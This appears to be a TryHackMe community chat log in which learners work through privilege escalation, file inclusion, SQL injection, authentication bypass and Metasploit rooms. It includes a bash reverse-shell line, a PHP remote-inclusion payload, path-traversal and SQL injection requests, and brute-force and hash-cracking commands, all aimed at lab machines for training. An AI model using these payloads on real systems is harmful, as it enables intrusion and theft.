Just terminated the machines and gone again. It has worked this time 👍. Thank you
glad you got it sorted! since it resets what user works when the machines start up, definitely worth restarting a machine. I've had fewer problems here, but frequently on HacktheBox I am at the end of my wits trying to figure out what I am doing wrong, restart the machine, and suddenly what I did just before works. 🙃
Hello, how to start pentesting? I am new here !
hi @half elbow , you can do some tryhackme rooms, and to unlock all the content, you can buy to have all unlimited
is that your actual name or a Fringe reference ? 😎
gpedit.msc -> computer config -> policies -> windows settings -> security settings -> account policies -> password policy -> password must meet complexity requirements
When enabled, this setting requires passwords to meet the following requirements:
Passwords may not contain the user's samAccountName (Account Name) value or entire displayName (Full Name value). Neither of these checks is case-sensitive.
Thanks for the info, I have solved it with reg in CLI
Gave +1 Rep to @ancient marlin
the tool is for searching public information (OSINT) of the domain on the internet,
you were testing against a local domain which have no access to the internet (THM machines cannot access WAN), so it won't leave any records on OSINT sources, thus you can't get any result.
Try to use the tool on some public domains and it will work
I tried my best to fix this tool, for me it didn’t work with any domain, no matter how popular, I tried removing the virustotal portion of code, etc. in my research I found people with the same issue dating back to 2021, no fixed have been proposed, so it seems the tool is simply deprecated.
I see, subfinder from Project Discovery is a good alternative though
There is an underscore in your request, instead of a hyphen in Content-Type; that's why the curl and subsequent requests were not successful.
Start the attached VM from Task 3 if it is not already started. On the AttackBox, open the terminal and use the telnet client to connect to the VM on port 80. What is the name of the running server?
what am i doing wrong
did it close the connection immediately? normally once it shows the "Escape character .." bit you should be able to enter "GET / HTTP/1.1" and get a response back that reveals the server info. I just tested it and it worked for me in the attack box, though it was a bit slow to respond to the get request (or maybe I'm just impatient early in the day)
ohh i am supposed to write that? i thought it would appear on its own. now that's my bad
ah yes, that's the problem then. when you put telnet IP PORT it establishes the connection and then waits for you to tell it what to do
gotcha thanks @amber scarab
Gave +1 Rep to @amber scarab
no problem! happy hacking 🙂
can u explain to me why email=x , password=x ,cpassword=x, what does x mean? and tell me why we are usually adding additional headers to the request??
It means that email, password and cpassword in that case don't matter as far as you want to enumerate usernames.
Additional headers are needed in the request in order to tell the backend application that the request was formed by a web form (otherwise the request may not be accepted).
@turbid patio you there?
did you get the priv esc on 9?
or do we have to go through the wildcard route?
use chmod to make the script executable
Hello
the part I stumbled upon is
just the one question
from memory (away from computer) the command that should end in > ls
No idea why it's not correct
even checked some write ups they all agree on the answer
you saw my forum reply then? damn
no wonder it's a ghost town everyone is here haha
I have 2manydiscord
Hello guys,
In Linux privilege escalation > Capstone challenge, i have a problem. I try to use an exploit from exploitDB but without success. Can someone help me understand how i can make it work please ? (It is CVE-2017-1000253)
I have tried to put the part between /** **/ in a file and execute it. And after, compile the exploit with : GCC exploit.c -O exploit. And run it
I do not remember this kind of CVE in any room. Are you sure it's the correct CVE?
@tranquil citrus it is for privilege escalation of the linux box. Linux 3.10.0
And when i look at the linux version of this box, i find 3.10.0 too
hi all
@turbid patio my bad every one has a different schedule
@prisma coral did you get it
hi guys, can i ask question to jr pentester path here , or i should put it on room_help only?
ask? 😉
task 3 question 4, walking an application, room
It asks to fetch the flag from the framework site. i have put the name of the file and found it. but it doesn't seem to be the flag.
uhm which section is it?
got it sec
well, the flag is inside the zip file
double click or unpack it, there is a txt file
you find it inside
so the task asks us to get to the framework site, once you get to that, it gives you the path as tmp.zip
after going to that path.
the whole page shows one line thm stat** lab*
nothing else.
yw ^^
took me like half an hour to figure this shit out xD frustrated xD
well, the section is a bit strange, but the following ones are pretty cool
i hope so xD
idk why they had to make it complicated sometime xD
🤷♂️
i looked up writeups for task 9 in linuxprivesc and they all seem to say the same thing which didn't work for me
what task is that? im atm in a room, perhaps i do remember the problem
echoing bin/bash to another command
to get root shell
oops dammit
it's in the complete beginner path
im an idiot haha
don't mind me
ehm like piping? that would be like for example .. ls -al | grep "what you look for"
something like that?
nah like echo "/bin/bash" > YOURCOMMAND
sorry for slow replies, had to do some work
To start the junior pentester path do i need to learn web development ?
I have completed pre security and introduction to cyber part and it's suggesting me to go for junior pentester path
I would recommend Complete Beginner Path
I have gone with a few but i am not getting it
Yes I completed that
Both certificates i got
It should be ok then. Go with this path
Where are you stuck?
Actually I am able to go as they ask but in a technical way i can't think like that on my own
That's very different from this path. Soc is more blue team oriented
While answering i sense where to find and i get it
Ohk so you mean while doing will get understanding
Like a bit bit
Just take notes and if you still don't understand, google it. It happens to all of us
I mean, not the answer but the explanation of how that works
Yes cause I am even learning from Coursera like the Google cyber security professional one
I am gaining knowledge from as many parts i can
Cause I am non IT guy
Let see thanks a lot
you don't have to force yourself to think on your own. for now just try to get whatever it is. the thinking part comes when u become a little bit practical, such as starting to use tools.
if u already completed intro to cyber and pre sec. u r good to go for jr pen test.
best of luck
Maybe Kernel exploit isn't one you look for
@tranquil citrus hello 🙂 what do you mean?
Hi guys, I'm stuck here
Looking at the page source of our Acme IT Support website (http://MACHINE_IP), you'll see a comment at the end of every page with a page load time and also a link to the framework's website, which is https://static-labs.tryhackme.cloud/sites/thm-web-framework. Let's take a look at that website. Viewing the documentation page gives us the path of the framework's administration portal, which gives us a flag if viewed on the Acme IT Support website.
Answer the questions below
What is the flag from the framework's administration portal?
did you even click on the administrator portal
@turbid patio lol are u up?
totally different schedules lmao
@flint yew did you finish the priv esc?
@covert sun do you still need help??
Yes i do..
okay, i'll hop in now. thanks
Gave +1 Rep to @median garden
np
anyone there that can help me?
Joined tryhackme and on the junior penetration tester path. My question is how do y’all remember and track back to the previous modules and rooms you have done . I mean, my goal is not just only answer each question and clear rooms , get the certification to , ultimate goal is learning , digesting and make it part of me and never to forget . Any recommendations?
I mean that you may try other ways to get in
Take notes on everything basically
Thank you , might as well do a physical note and with software application as well
Gave +1 Rep to @zealous dew
You could do physical for some things that are more theory-heavy, sure, but you're going to want some application for sure - there's tons of commands to learn, best to have a place to search for them and copy and paste
make notes in markdown and you can upload them to your github repo
you talking about the polkit exploit?
That’s a great suggestion and with the application it could help with like screenshots as well which can help with the commands
@median garden yup.. however I do rotating shifts so we will probably line up some days
which book would every hacker read to know good things or most of it during hacking or pentesting
if u know pls let me know]
i doubt everyone would agree?
but there's one thing I reckon everyone should read
from Phrack 49, "Smashing The Stack For Fun And Profit"
I don't code in C at all and it's still really good
and I still refer to it every so often
Lmao
hey, I'm at Privilege Escalation: Cron Jobs and I finished the tasks without using a reverse shell, because I couldn't manage to establish one. I adjusted the backup.sh as shown in the room (exchanged host address to my attacker machine ip/port) and just nothing arrives at my listening server... any hints? i don't really wanna move on until I know how to get that reverse shell 8*( .... Or am I even supposed to find other ways than a reverse shell to finish the task? This way I would have done everything right I guess :-D
ls -lah backup.sh
and tell shadow what is wrong
I recommend using obsidian to take notes in markdown
Good recommendations but I Tried it once but seems too complicated. Maybe I need to put more time on it
Then i suggest notion, its much more simple
Naah try Cherry Tree. A lot of people use it. It's not complicated to use and it gives you a lot of organization
hello can u explain to me why we chose four ../ in ../../../../etc/passwd
hey guys, wd up.
i am in the last task of subdomain enumeration.
i'm following the right IP and the command to find the wordlist but not getting any response.
is there something i am missing ?
or how do we know how to choose the number of ../
it indicates the path, the longer the path the more / are used in it.
how can we know the path when we don't have the hierarchy of the whole paths
what room is it ?
i didnt get to that yet sorry
i get it dw
You could use another command like pwd to see in what path you are
in the url you forgot " // " after http:
i put that still no result
Ah now I see, there is an error message after your command. It says that the file doesn't exist
the wordlist
yeah it says such directory doesn't exist , so should i change anything ?
Probably just that specific file doesn't exist in that directory
try with another wordlist
can you guide me how can i do that ?
are you using the AttackBox for that task?
yes
well it doesn't matter, I just checked and the "namelist.txt" should be on every machine
can you send a screenshot of the content of the DNS directory
now the content of the wordlists directory
you're typing "worldlists"
holy sss
try again to see if it works
same stuff
do you have something in the wordlists directory?
I would suggest to restart the AttackBox and try again
yeah I see, you're typing "SecLists" wrong
Man it took me so many screenshots to see the mistakes
yes i figured that out xD
sorry man , let me run the main one then
actually i am not able to copy and paste to the attackbox and have to type manually
yeah you can. On the left side of the screen there is a clipboard
You can paste it there and then to your attackbox
ahan alright. thanks man, let me run it then
ya got it. thank you man
np
hello
i need help im in
pentest jr
room subdomain enumeration task 4
the command dnsrecon doesn't work for me
Hey, thank you ... I added execute permissions on an earlier try but I must've done another mistake back then, because now it worked perfectly :)
Gave +1 Rep to @sage current
night owl? I was at work already :-D
no problem and glad you could figure it out
i need to click there ?
no to run it in attack box ?
Hi, I'm in the Linux Privilege Escalation room currently and there's this cronjob part that just doesn't seem to work. Idk if it's a bug but the cronjobs won't run properly for me
Here's what I put in the 'backup.sh' file:
#!/bin/bash
bash -i >& /dev/tcp/10.10.199.192/1234 0>&1
run ls -lah backup.sh
and then tell shadow why it is not working
this is a good lesson to learn about a specific permission bit
can root run executables that are non-executable??? the answer is no
how can you fix it??? yes chmod
Ah okay thank you, I'ma try to make it executable and update you
good luck and have fun
@sage current Thank you, this works for me!
Gave +1 Rep to @sage current
no problem
you just learnt a valuable lesson about linux file perms
it is a very very common thing to miss until you learn about it
Yeah it went over my head totally
o nm
So I'm in the file inclusion room (https://tryhackme.com/room/fileinc#) trying to do the last challenge where you have to use an RCE and then an RFI to execute hostname. I've been on this for like two days, I know what I need to do I'm just trying to get it to work. Following walkthroughs as well and doing exactly what they say but I just can't get the output onto the website
Spoilers below:
||I'm currently running a python default web server and it's serving the file (which is also accessible from the public internet, i can access it from my main pc).
My current php payload looks like this (because the walkthrough i was going through put exactly this):
<?php
print exec('hostname');
?>
But I have also tried:
<?PHP print exec("hostname"); ?>
and
<? PHP print exec("hostname"); ?>
However, when I put the URL IP:PORT/cmd.txt (accessible from the public internet) into the search box on the website (but also the file parameter in the URL), it does not show anything in the content preview. I have tried looking at the network requests and going through all the html. I have also tried changing the extension on the file to .php and using a raw paste on pastebin
Does anyone know what I'm missing here?||
Looking at the output from the python server it doesn't look like the tryhackme server is actually sending a request
The current url I'm using is http://10.10.238.213/playground.php?file=http://34.251.5.186:8000/cmd.txt (but I've tried a bunch of variants such as without the protocol, using a different file extension after copying etc). And I know http://34.251.5.186:8000/cmd.txt works because I can access it from the public internet on my normal pc (I'm using a kali box on tryhackme for the hosting)
(all of these IPs are either the tryhackme machine or the tryhackme linux box)
Okay I've tried using shell_exec() as well but it also doesn't work, tried on the server and pastebin
i think the issue is that the backend for the website isn't making a request to the endpoint at all, since the IP address never shows in the logs of the python http server, only mine and the kali box's
I'm on /playground.php, I'm like 99.9% sure this is the one with the RFI since I can add in remote files from the machine's server (I can put in the url for any of the labs into the playground page and have the PHP for that page inside the main page)
maybe there's an issue accepting traffic from IPs that aren't the machine's?
I'm not sure, kinda want some input on this because I'm like pretty sure I'm wrong and this is designed to make you try a bunch of things before getting the right answer so
In those boxes you are usually meant to host the files yourself with a simple python server for example and then use the ip of the attack box and not something on the open internet
I'm using the IP of the attack box, I was saying that I knew it was accessible because it's also on the open internet
I can try the local IP, give me a sec (I'm still not exactly sure how the VPNs work so)
The ip should be 10.10.x.y or 10.9.x.y
You are using the public ip. Try ifconfig and see the right ip there
why does thm does not recommend "script kiddie"
ty, giving me a parsing error but I can work it out from here now that I got it on there
kinda forgot about private ip in this case so ty
Gave +1 Rep to @restive sage
if you mean as like a term in general, probably because it puts down people who are trying to learn
especially in hacking, you're gonna be using a lot of tools and automation, and a lot of times "script kiddie" is used for someone who doesn't know what they're actually doing and just using code snippets/tools they find online
so especially when you're learning hacking, calling someone a "script kiddie" can make them feel like they're not actually learning anything (and thm is a learning site and they don't want people to feel that way)
Can anyone tell me how to crack this hash and salt with john?
hash: 0c01f4468bd75d7a84c7eb73846e8d96
salt: 1dac0d92e9fa6bb2
I already know it is a md5 where salt is before the hash.
I have tried commands without success... My file contains 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2.
I already know the password it's in the wordlist i provided, but cannot find a working command...
I found a hascat code that worked, but want to know how to do it with john:
hashcat -O -a 0 -m 20 0c01f4468bd75d7a84c7eb73846e8d96:1dac0d92e9fa6bb2 /usr/share/wordlists/rockyou.txt
why is it taking forever?
-p- will scan all 65535 ports
how long will it take
ah okay
You can use john --list=subformats to list and then use john --format=dynamic_xy to tell john which format it is
😭 its actually taking forever now
might better without -p- then
lemme give it a try
and put -vv at the end
gotcha
😔 it's showing me only 5 ports after scanning, but i can tell by the question there are more than 5, so i think I'm gonna rescan it with -p-
can you pls link the room that you're doing
then try with -p- and also leave -vv at the end
okay gotcha
if you just wanna list open ports, try
sudo nmap -p- --min-rate 10000 -vv $IP
It will finish in 30 seconds
i also want to see the hidden flags in server headers
Well, you can list open ports first then do
nmap -sVC -p xx,xx,xx,xx,xx,xx -T4 -Pn $IP -vv
That will be faster, i think
min-rate flag was helpful
I ran this and i got the output nmap -sC -sV --min-rate=1000 -p- 10.10.65.225 -vv
10000 not 1000
Nc ^
Did you get an answer? I am stuck in the same place; I get no results for task 6.
for me it was that SecList was in lower case
Try this:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u {Machine_IP}
hmm, for me the list is SecList, lowercase is not existent in my AttackBox. I now seem to have other issues. I wanted to terminate the target machine, it says it was terminated, but it is not. So, it may be the target that's acting up. Looking for help on how to force target shutdown. I appreciate the response!
Send some screenshots so we can help you better
you can add --stats-every= to have it print an update to the terminal at certain intervals to see how it is progressing. I'm impatient so I use this all the time with --stats-every=5s you can also push any key to get it to print a short update showing what % is done etc
Linux Privilege Escalation - Task 10 - Subtask 2 - Hint
"You can add the writable directory to your user's PATH and create a file named "thm" that the "./test" executable will read. The "thm" file can simply be a "cat" command that will read the flag file."
What does this even mean? I can create a file called thm that the ./test exe will read? What does that mean? It doesn't read anything. Then you can change the thm file to a cat command how what is the hint talking about bro? What is the stupid thm got to do with that at?
karen@ip-10-10-214-1:/home/murdoch$ ./test thm
sh: 1: thm: Permission denied
My guy what do you mean?!!?!?
It aint reading anything.
I've already added ||/home/murdoch|| to the path but now what?
Solved it, I got the machine all confused:
I was in a bash shell that couldn't run the ./test file correctly, this is wrong here -> karen@ip-10-10-214-1:/home/murdoch$
i think that capstone challenge room is not working
I am trying to ssh but it is going on time out
┌──(parallels㉿kali-linux-2022-2)-[~] └─$ sudo ssh leonard@10.10.201.246 ssh: connect to host 10.10.201.246 port 22: Connection timed out
working now
Hey there, for the boolean sqli task, it tells you to keep trying admin123 UNION SELECT 1,2,3 where database() like '%';-- with different letters added in front of the % until you get the full database name.
Is there a way of telling that you have reached the end of the database name besides none of the possible characters returning true?
Why do you think the username will be admin123?
that part is irrelevant for the task, it's written in the task description to just keep using it 🙂
The first part is wrong so that with the help of the union statement, the second part has to be true in order to return true. With that, we can start to figure out the correct payload for the task. That's why we chose admin123 deliberately because we know it is wrong.
You can try "where database() = 'yourguess';-- " and if it returns something you know it was the full name
@real shard
Hm, okay. Thanks for the reply 🙂
Another thing, for Burp Suite: The Basics on Task 7, question 3.
I know where the "Updates" sub-category is, but the base category for that does not seem to be the correct answer?
yeah things have changed so that room probably needs an update
Thing is, the solutions I found online used where it is for me as the answer. But apparently that is wrong, since the question expects a 5 character answer.
Kinda bugged by this, I don't like seeing it not solved :^)
Oh, thankfully you can see the correct answer in the screenshot of that task at least 😄
Hi, im doing task 3 of file inclusion challenges, and I'm stuck at it. I had no idea how to complete so looked it up on youtube and on this discord and noticed many using this: curl -X POST {IP} -d 'method=POST&file=../../../../etc/flag3%00' --output - . Can someone explain how this works? In particular the method part, where does this come from?
it works without the method=POST part, there is no reason to add this parameter
what is important is the -X POST, sending a POST request instead of a GET in this challenge makes the request go through
I see thanks
also im trying to do the RFI, but it keeps telling me the file isnt found. You happen to know why?
nvm got it
hello everyone, I wanted to know why the gcc line didn't work when you put any words (exploit, ...) and as soon as you put pwned instead it works. It's in the room: Linux Privilege Escalation part: Privilege Escalation: Kernel Exploits. Thanks in advance
That error message implies you somehow typed a non-printable between the - and the o the first time, did you type some kind of Unicode - or maybe paste it somehow? Basically it didn’t get the -o correctly so the command line parser treated ‘exploit’ as an input file instead of an output file, and the file ‘exploit’ didn’t exist to read.
Hi all, i did the metasploit module and i have a question. I did the ms17 exploit with the attack box, working well. I did the same with my own VM and the VPN THM. the exploit starts well connecting to the target, exploiting but the reverse did not work. How can i tell to msf that i want to use the interface tun01
Hello, you have to set the lhost, this is your address
you can set LHOST to an interface name. That exploit seems to get flakier with high ping.
You can use directly the interface as a parameter, for example set lhost tun0
ok i did it with the IP does not work, will try with TUN0
same thing waiting sending all but last fragment of exploit packet
If you did not restart the machine from the last time you exploited it, it is possible it won't work because of this. The exploits from metasploit are not working all the time, even if the target is vulnerable
i have two screen on with the local attack machine working fine and an other with a virtual box vm, maybe it is because of the interfaces in virtualbox
or the fw in place in my office
So if you are using both Attack Box and your own vm at the same time, I think if you already exploited the machine with the Attack Box, a second exploit could not work. Try restarting it and use just your vm.
ABdy i did that i'm pretty sure now that i'm not allowed to use the 4444 to go out
If the port is already used, yeah, you have to set other for a session
Is working now?
waiting for the vuln machine IP 🙂
not working but it's better
now i have a permission denied to bind to ip:443
You need root perms to bind to port 443.
that's it
working fine with root
that was because of lport (4444) not allowed
tks a lot for your help
thank youu !!
Gave +1 Rep to @trim cloud
In the vulnerability capstone challenge, got a rev shell using exploit.py.
When connecting to local machine via nc local_ip local_port connection succeeded but commands didn't seem to work
why is this happening ?
It's probably something like 'whatever command you ran for the revshell actually connected but the input or output of the shell is not actually connected correctly'.
e.g. the io redirections on a bash one-liner not being exactly correct, or the exact version of whatever utility used is the wrong version to support something, etc.
what might be done in this case ?
I don't think you actually need a full reverse shell to get the flag for that room.
Take that and run with it? 🙂
it returns "system" for every command executed
if you're using the same exploit I used, that's because it doesn't actually really parse out the command result very well. But you have the script, you can modify it.
alright, thanks @trim cloud
Gave +1 Rep to @trim cloud
that's a great tip! thanks
Gave +1 Rep to @amber scarab
Hey I have a quick question. I am in the third part of walking a web application and the Question asks, What is the directory listing flag? I have been here for about an hour before I started to seek help.|| One site advised to type in assets after the url from the home page, and they got it from inspecting the view source code, but when I read it, I would have never thought to just type in assets after the url. Intuitively, I would have typed the entire thing out, in which I did to see what it gave me, and it only displayed the css code. But when I just typed in the url with /assets as the end, it gave me the directory path, which ultimately led me to get my answer. How would I have known to type that in? or is that common, where you would only look for assets or type the first word of the href stored link? I hope that makes sense.||
Trying to think of how to explain this. 🙂 || If we're looking at plain web server that is serving completely static content from a filesystem, the paths in the URL always match up to a path in the filesystem. So if you have a url that is http://TARGET_IP/images/somefilename -> that tells you that there might be a directory named images and you can try to request it with http://TARGET_IP/images/ ||
So really it's just about || 'let's pick apart the url path and try to request things and see if things are actually there'||
||Now, it is not always the case that a server will serve from a filesystem and that the URLs will map to filesystem paths - a lot of the REST-style apps being built today are just a handler and some code that routes things to that handler -> but even if you are poking at an app like that, the fact that you have a url like http://TARGET_IP/some/long/pathway/to/something tells you that there might be something at any place you cut the '/', if that makes sense (e.g. you might want to poke at http://TARGET_IP/some/long/pathway and see what you get back, or http://TARGET_IP/some/long/, etc.)||
Done
@prime tree, I'm sure upper message requires mod team intrusion
Not sure if you meant my messages and I tried to explain in a ‘this is how things work’ way and not a ‘this is the answer to the room way’ but hey, I threw spoiler tags in just in case.
It was some spam in channel, so I call the mod to get rid of it. Spam was deleted but not my message
Figured it might be that too. Thanks!
Gave +1 Rep to @tranquil citrus
Just joined the other day and got paranoia that I was unintentionally doing something wrong.
Good day all! wrapping the Acmeitsupportv10 room (Developer Tools - Network). and it is not accepting the flag found in the response.. Any suggestions?
disregard... found the real flag.. LMAO
is there anyone can study with me?
Wdym?
Junior-pentester-path is tuff cause I am not a developer is it the reason or its just for over view like somepart from logical way I can do but some I have to go to youtube to understand
File inclusion part was tuff for me cause I don't know php and curl so should I study that first then continue or just go forward
You can use automated scripts like dirbuster + seclists to find entry points. I would also suggest learning burpsuite as fast as possible because it makes it much easier to web exploit. You don't need to know that much PHP/curl to exploit LFI, but it is a plus.
Yes burp suite is more further like few more left tasks to complete after that it is there
And even if I am trying to learn soc 1 then to this few paths are in there after that only I can move further
I am just getting concepts at the moment let see where it takes cause I am non IT person that's the reason I guess I am feeling tuff trying to switch career so let see thanks a lot @modest arch
Gave +1 Rep to @young spade
You don't need any dev skills for that. Modifying Python scripts isn't dev skill at all
It wasn't python the file inclusion part was php and as for dev I am just worried like I think to break I need to know how it's made and thanks a lot @tranquil citrus I am also learning from course cybersecurity professional one in coursera there is python once I learn might help
Gave +1 Rep to @tranquil citrus
Don't worry you'll start to learn development on more advanced levels of Infosec
Yes
Hey how did you know to navigate to tmp.zip? Wondering if I missed something..
when you visit the product website, it says there is a bug you can download a tmp.zip
The Acme IT support page?
Or the Framework page?
Oh wait nvm I just found lol. Thanks!
yw ^^
anyone here to pick at their brains? im stuck -_-
JR Pen> Metasploit>Exploits> Task 5
step three fly out of stuck
hahah
okay on a more serious note what are you not getting???
so im trying to run my exploit....
and it fails in metasploit
my target host and my local host is all good
not sure whats going on ive even checked out some vids on youtube and im doing everything right is seems?
can you run show options in metasploit and show a screenshot of what it outputs???
set a payload and multihandler, happens to me as well
the payload has to match msfvenom
ohhh maybe thats whats happening!
yep ive been dealing with this for 2 days
try setting payload first, then set multihandler and then set payload again
what the heck is the multihandler? lol
think nc -lvnp 1337 but for a lot of different types of reverse shells
and it is not relevant to task 5
let me get a screenshot and send it over @sage current
try using the attackbox, it might be failing on the vpn which often times happens
im kind of thinking thats whats happening... my local host was set to something different originally so i changed that accordingly, but im sort of stumped
im pretty sure im using the right vuln ... everything seems good, target host, lhost etc etc
when i enter: ifconfig everything seems good as well
ill try the attackbox and see if i can get it to work in there... @sage current if you have any other recommendations i appreciate that
thanks yall 🫡
you might need to restart the target machine as eternal blue can cause it to crash if you are unlucky
but your settings seems correct
yeah i should try that too. ill update here in a few. fingers crossed
im in TY ❤️
thanks @sage current
Gave +1 Rep to @sage current
Gave +1 Rep to @young spade
@sage current i sent you a private msg can you check ? noob question
yes generally
Hello all. Just doing the Net Sec Challenge and the final question, no matter what scan I do, the web site doesn't display a message
Was doing it from my Kali machine, then tried the Attack Box and still nothing.
No worries. Shut everything down and tried again on attack box and it worked.
Hello everyone 🙂 I have problem with SQL injection in part Burp Suite: Repeater task 8
I wanted to go time based sql injection so i tried
GET /about/2 UNION SELECT sleep(8),2,3,4,5 ;--
and it works, then i tried
GET /about/2 UNION SELECT sleep(8),2,3,4,5 WHERE database() LIKE 'p%' ;--
And no character works for that😞 i tried alphabet and numbers
hello guys can anyone of you explain to me how can i get the table_name or how can i know that the variable has name as table_name in SQL injection room !!!
and after it changed to columns_name how did he know that the variable has these names
information_schema.tables has information about tables in database. It contains names and a lot more. In this query you're asking information_schema about names of tables in this database. Same with information_schema.columns. I've read that most database systems contain information_schema, so group_concat(table_name) should work often in this type of attack. I hope i have helped you
okay thank u for this help
Gave +1 Rep to @gleaming crane
Anyone ? 🧐
Why does my traceroute results on tryhackme.com show only 10 hops & I have seen in others that they get 14 at once & also 28 hops?
Are you in the same building with others who try? I believe number of hops depends on your location and ISP.
"A popular tool for Blind XSS attacks is xsshunter. Although it's possible to make your own tool in JavaScript, this tool will automatically capture cookies, URLs, page contents and more."
XSSHunter is now deprecated.
Someone help in Authentication Bypass module task 2
getting this error using attack box
Nvm got it
task 3 didnt find any passwd
what usernames you have in valid usernames file
admin
robert
simon
steve
But I got it thanks I had separated them by enumerating them for some organization reason so I took them out and rotated them again and it worked
great
Hey guys just got some question,how to access VM with OpenVPN ?
There is an easy room telling you the steps.
which one ??
Which ever OS you use
@remote iris youre a room tester right? can you do sumn about this?
I've forwarded it on to staff, someone will pick it up soon, thanks for reporting.
Gave +1 Rep to @manic cairn
in hindsight, it seems like someone has uploaded xsshunter code onto github, so i think its still possible but its not so user friendly anymore
Thanks, I'll add that on also.
Gave +1 Rep to @manic cairn
@remote iris picture says v2, its currently in v3
small thing but looks nicer if its accurate
hey guys idk why but with scope enable and stuff like that,the new endpoints dont show up i think
Cans share images ?
!docs verify
Follow the above link.
hello is anyone here free to shed me some light of my confusion and question in metasploit in voice?
guys i cant find seclists in the dir,
Try just typing seclists
yes i did still the same result
Are you on the attackbox or a VM?
i tried tab and checked it seems its not there
im using VM
do i need to install seclists?
but im getting 404 if i try install
Are you on Kali Linux?
yes i tried sudo apt install seclists and its doing some install
is that the right command?
apt -y install seclists
thank you @remote iris life saver
Gave +1 Rep to @golden socket
Nvm it is just in my face
#start-here can answer that
Explain to me, what is it that I don't quite understand?
ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://MACHINE_IP/customers/login -fc 200
this is the command given to find a password from a table.
However, the command for some reason doesn't work. I know how to fix it and did (it's replacing W1 with the usernames manually), but I don't get why the original doesn't function. The File exists and the command is run, but the output is instant and in the form of a single errored find
Auth bypass room; task 3
Machine IP obviously replaced with the actual ip
Verify that you removed the numbers in valid_usernames.txt
Yeah I did
Only names in there
I also asked others and they encountered the same problem
ffuf has an issue with capitalisation. try replace SecList with seclist
nah it's not that
that gives a file not found error
already found that out xD
ahh no image perms
/usr/share/seclists/Usernames/Names/...
10.10.109.87 it is now
!docs verify
to post pics
wait I'm stupid, by room IP do you mean the one in the green round box or machine info?
not your vpn ip. the room ip yea. target
if that is your vpn ip might be ok to delete it
this is the target ip
although as I said, it changed from before I'm pretty sure
one sec
try this /usr/share/seclists/Passwords/Common-Credentials/10-million-password-list-top-100.txt
no such file or directory
attack box
ahaa. hmm.. then im not sure where seclist is installed
alrighty then I restarted the website (logged out and logged back in, restarted vm), did the command again and now it worked
very interesting
it's 100% not a file error.
the error is different
might be some small issue or smth. but if worked that is great
also before there was no error, just this:
:: Progress: [300/300] :: Job [1/1] 0 req/sec :: Duration [0:00:00] :: Error
that was the only output before
ah well, this work now ig
np. glad to help
Hi... I'm having trouble with the Metasploit Meterpreter room. I'm unable to use any payload to get a meterpreter. I'm using the provided username and password as SMBUser and SMBPass, and exploit windows/smb/psexec. What am I doing wrong?
!docs verify
to post pic. might be helpful
so it's a problem with the machine?
try to restart machine yea
wohoo! it worked! thanks... should have tried it earlier 🙂
Gave +1 Rep to @neat hazel
i try again and worked after few try
np. sometime just need more try
lol, I doubt that... I've been in that room for over 3 hours. I thought the issue was with the payload, so I tried with over 100 of them 😅
payload can be issue. since it is a windows machine it can get bonked so it doesn't work. restarting helps
yeah, had another room where I had to go through 10-20 payloads to find one that worked
yea. that can help in try and error phase. then you can check writeups to help
Hey, are there more information on how to actually find IDORs in JavaScript files ?
Like, nodejs code review or clientside js?
Both, I don't know much yet! Just finished the IDOR module of the Web Hacking section
But I'd like to dig deeper, as I'm not sure I completely get where/how to find IDOR when the URL aren't vulnerable
If the application is doing it safely, there will be checks before you're able to access an item, authorisation checks
These should be based on session cookies, JWTs, or something else that can't be tampered with by the user
Authorisation checks are a huge part of security and web application testing, authorisation flaws are extremely common
Oh okay, thanks a lot. When testing authentication, cookies always come in place?
Not always, there's quite a lot of ways applications can implement authentication
There's HTTP Authentication with Basic Auth, or Digest Auth etc.
There's also JWTs
Between those, those are the really common ones
Also it's important to be careful about the difference between authentication and authorisation
Authentication is checking who you are, authorisation is checking what you're allowed to do
Ahhh okay, thank you. I'm still a bit lost when speaking about the inner-working of web apps
I used to make several websites using Python & Django, but the authentication process was always "automated" by Django. I had nothing to do except writing forms and handling POST data.
I've found this example of a basic IDOR attack:
https://www.youtube.com/watch?v=Cxt_XU8V3tw
That's not an IDOR actually, that's just a business logic error
Common Weakness Enumeration (CWE) is a list of software weaknesses.
Ahhh
For example, attackers can look at places where user specific data is retrieved (e.g. search screens) and determine whether the key for the item being looked up is controllable externally. The key may be a hidden field in the HTML form field, might be passed as a URL parameter or as an unencrypted cookie variable, then in each of these cases it will be possible to tamper with the key value.
So how should we define an IDOR attack, then?
At its core, an IDOR is an authorisation failure
It's not just relying on some information the client provided, that's a much wider issue
The Ten Most Critical API Security Risks
It's more of an authorization bypass rather than just exploiting cookies or urls, then?
Not necessarily a bypass
You identify as another user to retrieve data
Not necessarily
If I change the number for something in a URL, that doesn't mean I'm presenting myself as a different user
Remember, who you are is authentication
Oh yes sorry I'm mistaking them. So it's not a matter of authentication but authorisation
So you exploit poorly configured authorisation basically?
Yep, that's why OWASP describe it as BOLA instead of IDOR
Broken Object Level Authorisation
No, that's quite a lot too wide
Ahaha sorry, I'm really still a noob in the field
THM is good but I would also recommend Portswigger Academy along with a good amount of external reading. Stick to trusted sources, OWASP put out some really good stuff
